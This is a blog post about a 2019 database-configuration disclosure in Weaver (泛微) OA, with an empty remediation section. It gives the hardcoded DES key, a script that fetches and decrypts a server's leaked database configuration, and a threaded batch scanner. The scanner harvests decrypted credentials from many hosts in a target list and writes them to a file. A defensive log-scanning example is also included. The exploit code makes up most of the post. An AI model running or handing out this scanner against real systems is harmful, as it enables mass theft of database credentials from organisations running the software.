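Weaver (泛微) OA Database Configuration Information Disclosure Vulnerability

0x00 Preface

Weaver has run into trouble yet again. On October 24, 2019, a database configuration information disclosure in Weaver OA was made public: an attacker can obtain the encrypted database configuration by requesting a specific page. The vulnerability is reproduced below.

0x01 Reproducing the vulnerability

The page that leaks the information is /mobile/DBconfigReader.jsp

Requesting it returns a string of garbled characters; a single line of garbled output in the response indicates that the vulnerability is present.

This garbled string is the database configuration information encrypted with DES, and the default key, which can be found in the source code, is 1z2x3c4v5b6n

Verification script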

```python
import requests
import pyDes


def desdecode(secret_key, s):
    # The pyDes constructor requires an 8-byte key, so a placeholder is passed
    # there and the 12-byte default key is set afterwards with setKey().
    cipherX = pyDes.des(b' ' * 8)
    cipherX.setKey(secret_key)
    y = cipherX.decrypt(s)
    return y


def info_decode(res):
    # Decrypt the response body with the default key and print the plaintext
    data = desdecode(b'1z2x3c4v5b6n', res.strip())
    data = data.strip().decode('utf-8', errors='replace')
    print(data)
    return data


if __name__ == '__main__':
    url = 'http://zhengbao.wang/mobile/DBconfigReader.jsp'
    res = requests.get(url).content
    info_decode(res)
```

Batch detection script

```python
import requests
import json
import queue
import threading
import pyDes


class Bruter(object):
    def __init__(self, urls, threads):
        self.vb_urls = queue.Queue()
        self.threads = threads
        for u in urls:
            self.vb_urls.put(u[0])

    def vb5_rce(self):
        while True:
            # get_nowait() avoids blocking forever when another thread
            # has already taken the last queued target
            try:
                target = self.vb_urls.get_nowait()
            except queue.Empty:
                break
            if 'http' not in target:
                target = 'http://' + target
            headers = {
                'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
                'Accept-Language': 'zh-CN,zh;q=0.9',
                'Content-Type': 'application/x-www-form-urlencoded'
            }
            url = target + '/mobile/DBconfigReader.jsp'
            try:
                res = requests.get(url=url, headers=headers, timeout=10)
                if res.status_code == 200:
                    if ('\r\n\r\n' in res.text) and (b':' in res.content) and 'java' not in res.text:
                        info = info_decode(res.content)
                        if 'user' in info:
                            print('[+] Vulnerable :' + url + ' ' + res.text)
                            file_write('e-cology-dbinfo.txt', url + ' | ' + info + '\n')
                    else:
                        print('[-] NotVulnerable :' + url)
                else:
                    print('[-] Not access :' + str(res.status_code) + ' | ' + url)
            except Exception:
                print('[!] Error :' + url)

    def run(self):
        for i in range(self.threads):
            print('[+] thread ' + str(i))
            t = threading.Thread(target=self.vb5_rce)
            t.start()


def get_url():
    # Target list: JSON file whose 'results' entries hold the host in field 0
    with open('e-cology-jsp-info.txt', 'r') as f:
        r = json.loads(f.read())
        urls = r['results']
    return urls


def file_write(name, results):
    with open(name, mode='a') as file:
        file.write(results)


def desdecode(secret_key, s):
    # The pyDes constructor requires an 8-byte key, so a placeholder is passed
    # there and the 12-byte default key is set afterwards with setKey().
    cipherX = pyDes.des(b' ' * 8)
    cipherX.setKey(secret_key)
    y = cipherX.decrypt(s)
    return y


def info_decode(res):
    data = desdecode(b'1z2x3c4v5b6n', res.strip())
    data = data.strip().decode('utf-8', errors='replace')
    return data


if __name__ == '__main__':
    urls = get_url()
    vb5_rce = Bruter(urls=urls, threads=20)
    vb5_rce.run()
```
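
To check whether this page has already been requested on a server you operate, the following added example (not part of the original post) scans web access logs for requests to /mobile/DBconfigReader.jsp. The combined log format, the sample lines, and the function names are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [24/Oct/2019:10:01:02 +0800] "GET /mobile/DBconfigReader.jsp HTTP/1.1" 200 152 "-" "python-requests/2.22.0"
198.51.100.9 - - [24/Oct/2019:10:05:40 +0800] "GET /mobile/%44BconfigReader.jsp;jsessionid=abc?x=1 HTTP/1.1" 200 152 "-" "Mozilla/5.0"
192.0.2.15 - - [24/Oct/2019:10:07:11 +0800] "GET /mobile//./dbconfigreader.JSP HTTP/1.1" 404 0 "-" "curl/7.64.0"
192.0.2.44 - - [24/Oct/2019:10:09:30 +0800] "GET /login/Login.jsp HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
"""

# Assumed log layout: ip, ident, user, [time], "request line", status, size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')
LEAK_PATH = "/mobile/dbconfigreader.jsp"


def normalize(target):
    """Reduce a request target to a lower-case path so equivalent spellings compare equal."""
    path = unquote(target.split("?", 1)[0])
    # Drop ";name=value" path parameters from every segment
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    # Collapse "//" and "./"; lower-casing assumes a case-insensitive server
    return "/" + posixpath.normpath(path).lstrip("/").lower()


def find_leak_requests(log_text):
    """Return one record per logged request that targeted the leaking page."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or normalize(m["target"]) != LEAK_PATH:
            continue
        status = int(m["status"])
        size = 0 if m["size"] == "-" else int(m["size"])
        # A 200 with a non-empty body means the ciphertext was probably served
        hits.append({"ip": m["ip"], "time": m["ts"], "status": status,
                     "size": size, "served": status == 200 and size > 0})
    return hits


if __name__ == "__main__":
    for h in find_leak_requests(SAMPLE_LOG):
        note = "ciphertext likely returned" if h["served"] else "probe, nothing served"
        print(f'{h["time"]} {h["ip"]} {h["status"]} {h["size"]}B  {note}')
```

Any record with "served" set should be treated as a disclosure of the database configuration, since the ciphertext is protected only by the default key described above.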

0x02 Remediation advice

0x03 References

https://github.com/NS-Sp4ce/Weaver-OA-E-cology-Database-Leak/blob/master/OA.py

https://github.com/jas502n/DBconfigReader

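Article title: Weaver (泛微) OA Database Configuration Information Disclosure Vulnerability

Author: boogle

Published: October 30, 2019 - 17:07

Last updated: October 30, 2019 - 19:18

Original link: https://zhengbao.wang/泛微OA数据库配置信息泄露漏洞/

License: Attribution-NonCommercial-NoDerivatives 4.0 International. Please retain the original link and author when reposting.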
